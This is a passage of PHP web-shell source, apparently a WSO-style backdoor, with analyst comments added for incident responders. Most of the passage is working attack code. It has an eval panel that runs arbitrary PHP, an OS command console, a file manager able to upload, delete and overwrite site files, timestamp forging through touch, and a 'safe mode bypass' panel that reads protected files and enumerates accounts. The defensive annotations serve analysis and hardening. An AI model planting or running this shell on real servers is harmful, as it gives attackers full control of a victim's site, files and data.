showSecParam(‘Hosts’, @file_get_contents(‘/etc/hosts’));
showSecParam(‘HDD space’, ex(‘df -h’));
showSecParam(‘Mount options’, @file_get_contents(‘/etc/fstab’));
}
} else {
showSecParam(‘OS Version’, ex(‘ver’));
showSecParam(‘Account Settings’, ex(‘net accounts’));
showSecParam(‘User Accounts’, ex(‘net user’));
}
echo ‘</div>’;
printFooter();
}
// "Php" page: runs PHP code supplied by the client. The posted p1 field is passed to eval()
// in both the AJAX path and the regular form path, so whoever passes the login gate runs
// arbitrary PHP with the rights of the web-server process. The code travels in the POST body,
// which access logs typically do not record; only the POST request to this file is visible there.
function actionPhp() {
if (isset($_POST[‘ajax’])) {
// AJAX path: the captured output is HTML-escaped, wrapped in a JavaScript assignment and
// prefixed with the length of that script, which is the format the page's
// processReqChange() parses before calling eval() on it.
$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = true;
ob_start();
eval($_POST[‘p1’]);
$temp = « document.getElementById(‘PhpOutput’).style.display= »;document.getElementById(‘PhpOutput’).innerHTML=' » . addcslashes(htmlspecialchars(ob_get_clean()), »
\' ») . « ‘;
« ;
echo strlen($temp), »
« , $temp;
exit;
}
printHeader();
// p2 == "info" embeds the phpinfo() output, with its stylesheet rules rewritten to fit the page.
if (isset($_POST[‘p2’]) && ($_POST[‘p2’] == ‘info’)) {
echo ‘<h1>PHP info</h1><div class=content>’;
ob_start();
phpinfo();
$tmp = ob_get_clean();
$tmp = preg_replace(‘!body {.*}!msiU’, », $tmp);
$tmp = preg_replace(‘!a:\w+ {.*}!msiU’, », $tmp);
$tmp = preg_replace(‘!h1!msiU’, ‘h2’, $tmp);
$tmp = preg_replace(‘!td, th {(.*)}!msiU’, ‘.e, .v, .h, .h th {$1}’, $tmp);
$tmp = preg_replace(‘!body, td, th, h2, h2 {.*}!msiU’, », $tmp);
echo $tmp;
echo ‘</div><br>’;
}
if (empty($_POST[‘ajax’]) && !empty($_POST[‘p1’])) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = false;
echo ‘<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit= »if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\’\’);}return false; »><textarea name=code class=bigarea id=PhpCode>’ . (!empty($_POST[‘p1’]) ? htmlspecialchars($_POST[‘p1’]) : ») . ‘</textarea><input type=submit value=Eval style= »margin-top:5px »>’;
echo ‘ <input type=checkbox name=ajax value=1 ‘ . (@$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] ? ‘checked’ : ») . ‘> send using AJAX</form><pre id=PhpOutput style= »‘ . (empty($_POST[‘p1’]) ? ‘display:none;’ : ») . ‘margin-top:5px; » class=ml1>’;
// Form path: same eval(), with the output HTML-escaped into the result block.
if (!empty($_POST[‘p1’])) {
ob_start();
eval($_POST[‘p1’]);
echo htmlspecialchars(ob_get_clean());
}
echo ‘</pre></div>’;
printFooter();
}
// "Files" page: first applies the sub-command in the posted p1 field (uploadFile, mkdir,
// delete, paste, or copy/move selection), then lists the current directory as a sortable table
// with per-entry links for view, chmod, rename, touch, edit and download.
// Every operation here changes or reads files with the rights of the web-server process, so
// after finding this shell the whole document root has to be checked for added, modified or
// deleted files, for instance against a clean WordPress copy or a backup.
function actionFilesMan() {
printHeader();
echo ‘<h1>File manager</h1><div class=content>’;
if (isset($_POST[‘p1’])) {
switch ($_POST[‘p1’]) {
case ‘uploadFile’:
// The upload is stored under the file name sent by the client, relative to the working
// directory; neither the name nor the content type is checked.
if (!@move_uploaded_file($_FILES[‘f’][‘tmp_name’], $_FILES[‘f’][‘name’])) echo « Can’t upload file! »;
break;
break;
case ‘mkdir’:
if (!@mkdir($_POST[‘p2’])) echo « Can’t create new dir »;
break;
case ‘delete’:
// Recursive delete of every posted entry; directories are emptied and then removed.
function deleteDir($path) {
$path = (substr($path, -1) == ‘/’) ? $path : $path . ‘/’;
$dh = opendir($path);
while (($item = readdir($dh)) !== false) {
$item = $path . $item;
if ((basename($item) == « .. ») || (basename($item) == « . »)) continue;
$type = filetype($item);
if ($type == « dir ») deleteDir($item);
else @unlink($item);
}
closedir($dh);
rmdir($path);
}
if (is_array(@$_POST[‘f’])) foreach ($_POST[‘f’] as $f) {
$f = urldecode($f);
if (is_dir($f)) deleteDir($f);
else @unlink($f);
}
break;
case ‘paste’:
// Applies the selection remembered in the session by an earlier copy/move request.
if ($_SESSION[‘act’] == ‘copy’) {
function copy_paste($c, $s, $d) {
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) if (($f != « . ») and ($f != « .. »)) {
copy_paste($c . $s . ‘/’, $f, $d . $s . ‘/’);
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION[‘f’] as $f) copy_paste($_SESSION[‘cwd’], $f, $GLOBALS[‘cwd’]);
} elseif ($_SESSION[‘act’] == ‘move’) {
// move_paste() is declared but not called in this branch; the move itself is done by rename().
function move_paste($c, $s, $d) {
if (is_dir($c . $s)) {
mkdir($d . $s);
$h = opendir($c . $s);
while (($f = readdir($h)) !== false) if (($f != « . ») and ($f != « .. »)) {
copy_paste($c . $s . ‘/’, $f, $d . $s . ‘/’);
}
} elseif (is_file($c . $s)) {
@copy($c . $s, $d . $s);
}
}
foreach ($_SESSION[‘f’] as $f) @rename($_SESSION[‘cwd’] . $f, $GLOBALS[‘cwd’] . $f);
}
unset($_SESSION[‘f’]);
break;
default:
// copy / move only record the selection and the source directory in the session.
if (!empty($_POST[‘p1’]) && (($_POST[‘p1’] == ‘copy’) || ($_POST[‘p1’] == ‘move’))) {
$_SESSION[‘act’] = @$_POST[‘p1’];
$_SESSION[‘f’] = @$_POST[‘f’];
foreach ($_SESSION[‘f’] as $k => $f) $_SESSION[‘f’][$k] = urldecode($f);
$_SESSION[‘cwd’] = @$_POST[‘c’];
}
break;
}
echo ‘<script>document.mf.p1.value= » »;document.mf.p2.value= » »;</script>’;
}
// Directory listing of the posted "c" path, or of the working directory when none is posted.
$dirContent = @scandir(isset($_POST[‘c’]) ? $_POST[‘c’] : $GLOBALS[‘cwd’]);
if ($dirContent === false) {
echo ‘Can\’t open this folder!’;
return;
}
// Sort column and direction; a p1 value of the form s_<column>_<digit> overrides the default.
global $sort;
$sort = array(‘name’, 1);
if (!empty($_POST[‘p1’])) {
if (preg_match(‘!s_([A-z]+)_(\d{1})!’, $_POST[‘p1’], $match)) $sort = array($match[1], (int)$match[2]);
}
echo ‘<script>
function sa() {
for(i=0;i<document.files.elements.length;i++)
if(document.files.elements[i].type == \’checkbox\’)
document.files.elements[i].checked = document.files.elements[0].checked;
}
</script>
<table width=\’100%\’ class=\’main\’ cellspacing=\’0\’ cellpadding=\’2\’>
<form name=files method=post>’;
echo « <tr><th width=’13px’><input type=checkbox onclick=’sa()’ class=chkbx></th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_name_ » . ($sort[1] ? 0 : 1) . « \ »)’>Name</a></th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_size_ » . ($sort[1] ? 0 : 1) . « \ »)’>Size</a></th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_modify_ » . ($sort[1] ? 0 : 1) . « \ »)’>Modify</a></th><th>Owner/Group</th><th><a href=’#’ onclick=’g(\ »FilesMan\ »,null,\ »s_perms_ » . ($sort[1] ? 0 : 1) . « \ »)’>Permissions</a></th><th>Actions</th></tr> »;
// One record per entry (name, path, mtime, permissions, size, owner, group), split into
// directories, links and files so that each group can be sorted separately.
$dirs = $files = $links = array();
$n = count($dirContent);
for ($i = 0;$i < $n;$i++) {
$ow = @posix_getpwuid(@fileowner($dirContent[$i]));
$gr = @posix_getgrgid(@filegroup($dirContent[$i]));
$tmp = array(‘name’ => $dirContent[$i], ‘path’ => $GLOBALS[‘cwd’] . $dirContent[$i], ‘modify’ => @date(‘Y-m-d H:i:s’, @filemtime($GLOBALS[‘cwd’] . $dirContent[$i])), ‘perms’ => viewPermsColor($GLOBALS[‘cwd’] . $dirContent[$i]), ‘size’ => @filesize($GLOBALS[‘cwd’] . $dirContent[$i]), ‘owner’ => $ow[‘name’] ? $ow[‘name’] : @fileowner($dirContent[$i]), ‘group’ => $gr[‘name’] ? $gr[‘name’] : @filegroup($dirContent[$i]));
if (@is_file($GLOBALS[‘cwd’] . $dirContent[$i])) $files[] = array_merge($tmp, array(‘type’ => ‘file’));
elseif (@is_link($GLOBALS[‘cwd’] . $dirContent[$i])) $links[] = array_merge($tmp, array(‘type’ => ‘link’));
elseif (@is_dir($GLOBALS[‘cwd’] . $dirContent[$i]) && ($dirContent[$i] != « . »)) $dirs[] = array_merge($tmp, array(‘type’ => ‘dir’));
}
$GLOBALS[‘sort’] = $sort;
// Comparator for usort(): string compare on the chosen column, numeric compare for size,
// with the sign flipped when the direction flag is 0.
function cmp($a, $b) {
if ($GLOBALS[‘sort’][0] != ‘size’) return strcmp($a[$GLOBALS[‘sort’][0]], $b[$GLOBALS[‘sort’][0]]) * ($GLOBALS[‘sort’][1] ? 1 : -1);
else return (($a[‘size’] < $b[‘size’]) ? -1 : 1) * ($GLOBALS[‘sort’][1] ? 1 : -1);
}
usort($files, « cmp »);
usort($dirs, « cmp »);
usort($links, « cmp »);
$files = array_merge($dirs, $links, $files);
$l = 0;
foreach ($files as $f) {
echo ‘<tr’ . ($l ? ‘ class=l1’ : ») . ‘><td><input type=checkbox name= »f[] » value= »‘ . urlencode($f[‘name’]) . ‘ » class=chkbx></td><td><a href=# onclick= »‘ . (($f[‘type’] == ‘file’) ? ‘g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’view\’) »>’ . htmlspecialchars($f[‘name’]) : ‘g(\’FilesMan\’,\ » . $f[‘path’] . ‘\’); »><b>[ ‘ . htmlspecialchars($f[‘name’]) . ‘ ]</b>’) . ‘</a></td><td>’ . (($f[‘type’] == ‘file’) ? viewSize($f[‘size’]) : $f[‘type’]) . ‘</td><td>’ . $f[‘modify’] . ‘</td><td>’ . $f[‘owner’] . ‘/’ . $f[‘group’] . ‘</td><td><a href=# onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’,\’chmod\’) »>’ . $f[‘perms’] . ‘</td><td><a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’rename\’) »>R</a> <a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’touch\’) »>T</a>’ . (($f[‘type’] == ‘file’) ? ‘ <a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’edit\’) »>E</a> <a href= »# » onclick= »g(\’FilesTools\’,null,\ » . urlencode($f[‘name’]) . ‘\’, \’download\’) »>D</a>’ : ») . ‘</td></tr>’;
$l = $l ? 0 : 1;
}
echo ‘<tr><td colspan=5>
<input type=hidden name=a value=\’FilesMan\’>
<input type=hidden name=c value= »‘ . htmlspecialchars($GLOBALS[‘cwd’]) . ‘ »>
<input type=hidden name=charset value= »‘ . (isset($_POST[‘charset’]) ? $_POST[‘charset’] : ») . ‘ »>
<select name=\’p1\’><option value=\’copy\’>Copy</option><option value=\’move\’>Move</option><option value=\’delete\’>Delete</option>’;
if (!empty($_SESSION[‘act’]) && @count($_SESSION[‘f’])) {
echo ‘<option value=\’paste\’>Paste</option>’;
}
echo ‘</select> <input type= »submit » value= »>> »></td><td colspan= »2″ align= »right » width= »1″><input name= »def » value= »Comming Soon!!! » disabled= »disabled »/> <input type= »submit » value= »Add Deface Here » disabled= »disabled »></td></tr>
</form></table></div>’;
printFooter();
}
// actionStringTools(): "String conversions" panel of the decoded web shell.
// Reading notes for incident responders:
// - The name of the function to run arrives in $_POST['p1'] and its single argument in $_POST['p2'].
//   function_exists() is the only check made before the call; the $stringTools list further down only
//   fills the <select> and is not enforced on the server side, so any request reaching this handler
//   should be triaged as code execution, not as a harmless encoder.
// - When $_POST['ajax'] is set, the result is sent back as a JavaScript snippet preceded by its length.
// - Takes no parameters and returns nothing; all input comes from $_POST and $_SESSION.
function actionStringTools() {
// Helper conversions, each declared only if the name is not already defined.
if (!function_exists(‘hex2bin’)) {
function hex2bin($p) {
return decbin(hexdec($p));
}
}
if (!function_exists(‘hex2ascii’)) {
function hex2ascii($p) {
$r = »;
for ($i = 0;$i < strLen($p);$i+= 2) {
$r.= chr(hexdec($p[$i] . $p[$i + 1]));
}
return $r;
}
}
if (!function_exists(‘ascii2hex’)) {
function ascii2hex($p) {
$r = »;
for ($i = 0;$i < strlen($p);++$i) $r.= dechex(ord($p[$i]));
return strtoupper($r);
}
}
if (!function_exists(‘full_urlencode’)) {
function full_urlencode($p) {
$r = »;
for ($i = 0;$i < strlen($p);++$i) $r.= ‘%’ . dechex(ord($p[$i]));
return strtoupper($r);
}
}
// AJAX branch: remember the AJAX preference in the session, run the requested function inside an
// output buffer, wrap the HTML-escaped result in a JavaScript assignment, print length + payload, stop.
if (isset($_POST[‘ajax’])) {
$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = true;
ob_start();
if (function_exists($_POST[‘p1’])) echo $_POST[‘p1’]($_POST[‘p2’]);
$temp = « document.getElementById(‘strOutput’).style.display= »;document.getElementById(‘strOutput’).innerHTML=' » . addcslashes(htmlspecialchars(ob_get_clean()), »
\' ») . « ‘;
« ;
echo strlen($temp), »
« , $temp;
exit;
}
// Non-AJAX branch: render the form, then the result (if p1 was posted) inside <pre id=strOutput>.
printHeader();
echo ‘<h1>String conversions</h1><div class=content>’;
// Label => PHP function name pairs shown in the drop-down.
$stringTools = array(‘Base64 encode’ => ‘base64_encode’, ‘Base64 decode’ => ‘base64_decode’, ‘Url encode’ => ‘urlencode’, ‘Url decode’ => ‘urldecode’, ‘Full urlencode’ => ‘full_urlencode’, ‘md5 hash’ => ‘md5’, ‘sha1 hash’ => ‘sha1’, ‘crypt’ => ‘crypt’, ‘CRC32’ => ‘crc32’, ‘ASCII to HEX’ => ‘ascii2hex’, ‘HEX to ASCII’ => ‘hex2ascii’, ‘HEX to DEC’ => ‘hexdec’, ‘HEX to BIN’ => ‘hex2bin’, ‘DEC to HEX’ => ‘dechex’, ‘DEC to BIN’ => ‘decbin’, ‘BIN to HEX’ => ‘bin2hex’, ‘BIN to DEC’ => ‘bindec’, ‘String to lower case’ => ‘strtolower’, ‘String to upper case’ => ‘strtoupper’, ‘Htmlspecialchars’ => ‘htmlspecialchars’, ‘String length’ => ‘strlen’,);
if (empty($_POST[‘ajax’]) && !empty($_POST[‘p1’])) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = false;
echo « <form name=’toolsForm’ onSubmit=’if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;’><select name=’selectTool’> »;
foreach ($stringTools as $k => $v) echo « <option value=' » . htmlspecialchars($v) . « ‘> » . $k . « </option> »;
echo « </select><input type=’submit’ value=’>>’/> <input type=checkbox name=ajax value=1 » . ($_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] ? ‘checked’ : ») . « > send using AJAX<br><textarea name=’input’ style=’margin-top:5px’ class=bigarea> » . htmlspecialchars(@$_POST[‘p2′]) . « </textarea></form><pre class=’ml1’ style=' » . (empty($_POST[‘p1’]) ? ‘display:none;’ : ») . « margin-top:5px’ id=’strOutput’> »;
// Same dynamic call as in the AJAX branch; the result is HTML-escaped before it is printed.
if (!empty($_POST[‘p1’])) {
if (function_exists($_POST[‘p1’])) echo htmlspecialchars($_POST[‘p1’]($_POST[‘p2’]));
}
echo « </pre></div> »;
printFooter();
}
// actionFilesTools(): per-file operations of the web shell (view, highlight, download, hexdump,
// edit, chmod, rename, touch, mkfile).
// Inputs, all taken from the request: $_POST['p1'] = target path (URL-decoded first),
// $_POST['p2'] = operation, $_POST['p3'] = operation argument (octal mode string, new file content,
// new name, or a date string). No path restriction is applied anywhere in this function.
// Forensic relevance: 'edit' overwrites content, 'rename' moves files, 'chmod' changes modes and
// 'touch' sets both access and modification time to a value chosen by the operator, so mtime of
// files in a compromised tree is not trustworthy on its own; compare with the inode change time
// and with backups or integrity baselines.
function actionFilesTools() {
if (isset($_POST[‘p1’])) $_POST[‘p1’] = urldecode($_POST[‘p1’]);
// download: sends the file as a gzip-compressed attachment and stops.
if (@$_POST[‘p2’] == ‘download’) {
if (is_file($_POST[‘p1’]) && is_readable($_POST[‘p1’])) {
ob_start(« ob_gzhandler », 4096);
header(« Content-Disposition: attachment; filename= » . basename($_POST[‘p1’]));
if (function_exists(« mime_content_type »)) {
$type = @mime_content_type($_POST[‘p1’]);
header(« Content-Type: » . $type);
}
$fp = @fopen($_POST[‘p1’], « r »);
if ($fp) {
while (!@feof($fp)) echo @fread($fp, 1024);
fclose($fp);
}
} elseif (is_dir($_POST[‘p1’]) && is_readable($_POST[‘p1’])) {
// Directory download is an empty stub in this sample.
}
exit;
}
// mkfile: creates an empty file when the path does not exist yet, then continues as 'edit'.
if (@$_POST[‘p2’] == ‘mkfile’) {
if (!file_exists($_POST[‘p1’])) {
$fp = @fopen($_POST[‘p1’], ‘w’);
if ($fp) {
$_POST[‘p2’] = « edit »;
fclose($fp);
}
}
}
printHeader();
echo ‘<h1>File tools</h1><div class=content>’;
if (!file_exists(@$_POST[‘p1’])) {
echo ‘File not exists’;
printFooter();
return;
}
// File summary line: name, size, permissions, owner/group and the three timestamps.
$uid = @posix_getpwuid(@fileowner($_POST[‘p1’]));
$gid = @posix_getgrgid(@fileowner($_POST[‘p1’]));
echo ‘<span>Name:</span> ‘ . htmlspecialchars($_POST[‘p1’]) . ‘ <span>Size:</span> ‘ . (is_file($_POST[‘p1’]) ? viewSize(filesize($_POST[‘p1’])) : ‘-‘) . ‘ <span>Permission:</span> ‘ . viewPermsColor($_POST[‘p1’]) . ‘ <span>Owner/Group:</span> ‘ . $uid[‘name’] . ‘/’ . $gid[‘name’] . ‘<br>’;
echo ‘<span>Create time:</span> ‘ . date(‘Y-m-d H:i:s’, filectime($_POST[‘p1’])) . ‘ <span>Access time:</span> ‘ . date(‘Y-m-d H:i:s’, fileatime($_POST[‘p1’])) . ‘ <span>Modify time:</span> ‘ . date(‘Y-m-d H:i:s’, filemtime($_POST[‘p1’])) . ‘<br><br>’;
if (empty($_POST[‘p2’])) $_POST[‘p2’] = ‘view’;
// Menu of operations; directories only get chmod / rename / touch.
if (is_file($_POST[‘p1’])) $m = array(‘View’, ‘Highlight’, ‘Download’, ‘Hexdump’, ‘Edit’, ‘Chmod’, ‘Rename’, ‘Touch’);
else $m = array(‘Chmod’, ‘Rename’, ‘Touch’);
foreach ($m as $v) echo ‘<a href=# onclick= »g(null,null,null,\ » . strtolower($v) . ‘\’) »>’ . ((strtolower($v) == @$_POST[‘p2’]) ? ‘<b>[ ‘ . $v . ‘ ]</b>’ : $v) . ‘</a> ‘;
echo ‘<br><br>’;
switch ($_POST[‘p2’]) {
// view: prints the file HTML-escaped, 1024 bytes at a time.
case ‘view’:
echo ‘<pre class=ml1>’;
$fp = @fopen($_POST[‘p1’], ‘r’);
if ($fp) {
while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo ‘</pre>’;
break;
// highlight: PHP syntax highlighting of the file via highlight_file().
case ‘highlight’:
if (is_readable($_POST[‘p1’])) {
echo ‘<div class=ml1 style= »background-color: #e1e1e1;color:black; »>’;
$code = highlight_file($_POST[‘p1’], true);
echo str_replace(array(‘<span ‘, ‘</span>’), array(‘<font ‘, ‘</font>’), $code) . ‘</div>’;
}
break;
// chmod: p3 is read digit by digit as an octal mode and applied with chmod().
case ‘chmod’:
if (!empty($_POST[‘p3’])) {
$perms = 0;
for ($i = strlen($_POST[‘p3’]) – 1;$i >= 0;–$i) $perms+= (int)$_POST[‘p3’][$i] * pow(8, (strlen($_POST[‘p3’]) – $i – 1));
if (!@chmod($_POST[‘p1’], $perms)) echo ‘Can\’t set permissions!<br><script>document.mf.p3.value= » »;</script>’;
else die(‘<script>g(null,null,null,null, » »)</script>’);
}
echo ‘<form onsubmit= »g(null,null,null,null,this.chmod.value);return false; »><input type=text name=chmod value= »‘ . substr(sprintf(‘%o’, fileperms($_POST[‘p1’])), -4) . ‘ »><input type=submit value= »>> »></form>’;
break;
// edit: p3, when present, replaces the whole file; this is how existing site files get modified.
case ‘edit’:
if (!is_writable($_POST[‘p1’])) {
echo ‘File isn\’t writeable’;
break;
}
if (!empty($_POST[‘p3’])) {
@file_put_contents($_POST[‘p1’], $_POST[‘p3’]);
echo ‘Saved!<br><script>document.mf.p3.value= » »;</script>’;
}
echo ‘<form onsubmit= »g(null,null,null,null,this.text.value);return false; »><textarea name=text class=bigarea>’;
$fp = @fopen($_POST[‘p1’], ‘r’);
if ($fp) {
while (!@feof($fp)) echo htmlspecialchars(@fread($fp, 1024));
@fclose($fp);
}
echo ‘</textarea><input type=submit value= »>> »></form>’;
break;
// hexdump: builds three columns (offset, hex bytes, printable text), 32 bytes per row.
case ‘hexdump’:
$c = @file_get_contents($_POST[‘p1’]);
$n = 0;
$h = array(‘00000000<br>’, », »);
$len = strlen($c);
for ($i = 0;$i < $len;++$i) {
$h[1].= sprintf(‘%02X’, ord($c[$i])) . ‘ ‘;
switch (ord($c[$i])) {
case 0:
$h[2].= ‘ ‘;
break;
case 9:
$h[2].= ‘ ‘;
break;
case 10:
$h[2].= ‘ ‘;
break;
case 13:
$h[2].= ‘ ‘;
break;
default:
$h[2].= $c[$i];
break;
}
$n++;
if ($n == 32) {
$n = 0;
if ($i + 1 < $len) {
$h[0].= sprintf(‘%08X’, $i + 1) . ‘<br>’;
}
$h[1].= ‘<br>’;
$h[2].= »
« ;
}
}
echo ‘<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style= »font-weight: normal; »><pre>’ . $h[0] . ‘</pre></span></td><td bgcolor=#282828><pre>’ . $h[1] . ‘</pre></td><td bgcolor=#333333><pre>’ . htmlspecialchars($h[2]) . ‘</pre></td></tr></table>’;
break;
// rename: moves p1 to the path given in p3.
case ‘rename’:
if (!empty($_POST[‘p3’])) {
if (!@rename($_POST[‘p1’], $_POST[‘p3’])) echo ‘Can\’t rename!<br><script>document.mf.p3.value= » »;</script>’;
else die(‘<script>g(null,null, »‘ . urlencode($_POST[‘p3’]) . ‘ »,null, » »)</script>’);
}
echo ‘<form onsubmit= »g(null,null,null,null,this.name.value);return false; »><input type=text name=name value= »‘ . htmlspecialchars($_POST[‘p1’]) . ‘ »><input type=submit value= »>> »></form>’;
break;
// touch: p3 is parsed with strtotime() and written as both mtime and atime (timestamp tampering).
case ‘touch’:
if (!empty($_POST[‘p3’])) {
$time = strtotime($_POST[‘p3’]);
if ($time) {
if (@touch($_POST[‘p1’], $time, $time)) die(‘<script>g(null,null,null,null, » »)</script>’);
else {
echo ‘Fail!<script>document.mf.p3.value= » »;</script>’;
}
} else echo ‘Bad time format!<script>document.mf.p3.value= » »;</script>’;
}
echo ‘<form onsubmit= »g(null,null,null,null,this.touch.value);return false; »><input type=text name=touch value= »‘ . date(« Y-m-d H:i:s », @filemtime($_POST[‘p1’])) . ‘ »><input type=submit value= »>> »></form>’;
break;
case ‘mkfile’:
break;
}
echo ‘</div>’;
printFooter();
}
// actionSafeMode(): "Safe mode bypass" panel. $_POST['p1'] (1-6) selects a way of reading a file or
// listing a directory through a PHP feature other than the plain file functions; $_POST['p2'] is
// the path (for case 5, p2..p3 is a numeric UID range). Output is buffered and shown in <pre id=Output>.
// Hardening pointers taken from the calls used below: copy() with the compress.zlib:// wrapper,
// glob(), curl with a file:// URL, ini_restore() followed by include, posix_getpwuid(), imap_open().
// Where a site does not need them they are candidates for disable_functions or for removing the
// extension; safe_mode itself no longer exists in current PHP releases, so it must not be counted
// on as a control.
function actionSafeMode() {
$temp = »;
ob_start();
switch ($_POST[‘p1’]) {
// 1: copy the target through the compress.zlib:// wrapper into a temp file, print it, delete the temp file.
case 1:
$temp = @tempnam($test, ‘cx’);
if (@copy(« compress.zlib:// » . $_POST[‘p2’], $temp)) {
echo @file_get_contents($temp);
unlink($temp);
} else echo ‘Sorry… Can\’t open file’;
break;
// 2: directory listing via glob() on p2 with a trailing wildcard.
case 2:
$files = glob($_POST[‘p2’] . ‘*’);
if (is_array($files)) foreach ($files as $filename) echo $filename . »
« ;
break;
// 3: file read through the curl extension using a file:// URL.
case 3:
$ch = curl_init(« file:// » . $_POST[‘p2’] . « » . SELF_PATH);
curl_exec($ch);
break;
// 4: restores the safe_mode / open_basedir ini values, then include()s the path from p2
// (include also executes the file if it contains PHP).
case 4:
ini_restore(« safe_mode »);
ini_restore(« open_basedir »);
include ($_POST[‘p2’]);
break;
// 5: account enumeration without opening /etc/passwd: posix_getpwuid() for each UID in p2..p3.
case 5:
for (;$_POST[‘p2’] <= $_POST[‘p3’];$_POST[‘p2’]++) {
$uid = @posix_getpwuid($_POST[‘p2’]);
if ($uid) echo join(‘:’, $uid) . »
« ;
}
break;
// 6: file read through imap_open() with p2 as the mailbox argument, when the IMAP extension is loaded.
case 6:
if (!function_exists(‘imap_open’)) break;
$stream = imap_open($_POST[‘p2’], « », « »);
if ($stream == FALSE) break;
echo imap_body($stream, 1);
imap_close($stream);
break;
}
$temp = ob_get_clean();
printHeader();
echo ‘<h1>Safe mode bypass</h1><div class=content>’;
echo ‘<span>Copy (read file)</span><form onsubmit=\’g(null,null, »1″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Glob (list dir)</span><form onsubmit=\’g(null,null, »2″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Curl (read file)</span><form onsubmit=\’g(null,null, »3″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Ini_restore (read file)</span><form onsubmit=\’g(null,null, »4″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form><br><span>Posix_getpwuid (« Read » /etc/passwd)</span><table><form onsubmit=\’g(null,null, »5″,this.param1.value,this.param2.value);return false;\’><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value= »>> »></form><br><br><span>Imap_open (read file)</span><form onsubmit=\’g(null,null, »6″,this.param.value);return false;\’><input type=text name=param><input type=submit value= »>> »></form>’;
// The buffered result is printed as-is (not HTML-escaped) below the forms.
if ($temp) echo ‘<pre class= »ml1″ style= »margin-top:5px » id= »Output »>’ . $temp . ‘</pre>’;
echo ‘</div>’;
printFooter();
}
// actionConsole(): interactive command console of the web shell.
// $_POST['p1'] is handed to ex(), a helper defined outside this excerpt; judging by its use here it
// runs the string as an operating-system command and returns the output (confirm against the full sample).
// $_POST['charset'] is used as the iconv() source encoding for the AJAX reply.
// Detection notes: the forms in this excerpt submit by POST, so a standard access log shows only
// repeated POSTs to the one file without the commands themselves; request-body logging or process
// auditing of the web-server account (child processes spawned by PHP) is what recovers the activity.
function actionConsole() {
// AJAX branch: reply is a JavaScript fragment that appends the command and its output to the textarea.
if (isset($_POST[‘ajax’])) {
$_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = true;
ob_start();
echo « document.cf.cmd.value= »;
« ;
$temp = @iconv($_POST[‘charset’], ‘UTF-8’, addcslashes( »
$ » . $_POST[‘p1’] . »
» . ex($_POST[‘p1’]), »
\' »));
// A command ending in "cd <dir>" is mirrored with chdir() so the panel's working directory follows it.
if (preg_match(« !.*cd\s+([^;]+)$! », $_POST[‘p1’], $match)) {
if (@chdir($match[1])) {
$GLOBALS[‘cwd’] = @getcwd();
echo « document.mf.c.value=' » . $GLOBALS[‘cwd’] . « ‘; »;
}
}
echo « document.cf.output.value+=' » . $temp . « ‘; »;
echo « document.cf.output.scrollTop = document.cf.output.scrollHeight; »;
$temp = ob_get_clean();
echo strlen($temp), »
« , $temp;
exit;
}
// Full-page branch: emits the client-side command history script (up/down arrow keys) and the form.
printHeader();
echo ‘<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array(« »);
var cur = 0;
function kp(e) {
var n = (window.Event) ? e.which : e.keyCode;
if(n == 38) {
cur–;
if(cur>=0)
document.cf.cmd.value = cmds[cur];
else
cur++;
} else if(n == 40) {
cur++;
if(cur < cmds.length)
document.cf.cmd.value = cmds[cur];
else
cur–;
}
}
function add(cmd) {
cmds.pop();
cmds.push(cmd);
cmds.push(« »);
cur = cmds.length-1;
}
</script>’;
echo ‘<h1>Console</h1><div class=content><form name=cf onsubmit= »if(document.cf.cmd.value==\’clear\’){document.cf.output.value=\’\’;document.cf.cmd.value=\’\’;return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false; »><select name=alias>’;
// $GLOBALS['aliases'] is defined outside this excerpt; here it is rendered as a drop-down of
// label => command pairs, with empty values used as group headings.
foreach ($GLOBALS[‘aliases’] as $n => $v) {
if ($v == ») {
echo ‘<optgroup label= »-‘ . htmlspecialchars($n) . ‘-« ></optgroup>’;
continue;
}
echo ‘<option value= »‘ . htmlspecialchars($v) . ‘ »>’ . $n . ‘</option>’;
}
if (empty($_POST[‘ajax’]) && !empty($_POST[‘p1’])) $_SESSION[md5($_SERVER[‘HTTP_HOST’]) . ‘ajax’] = false;
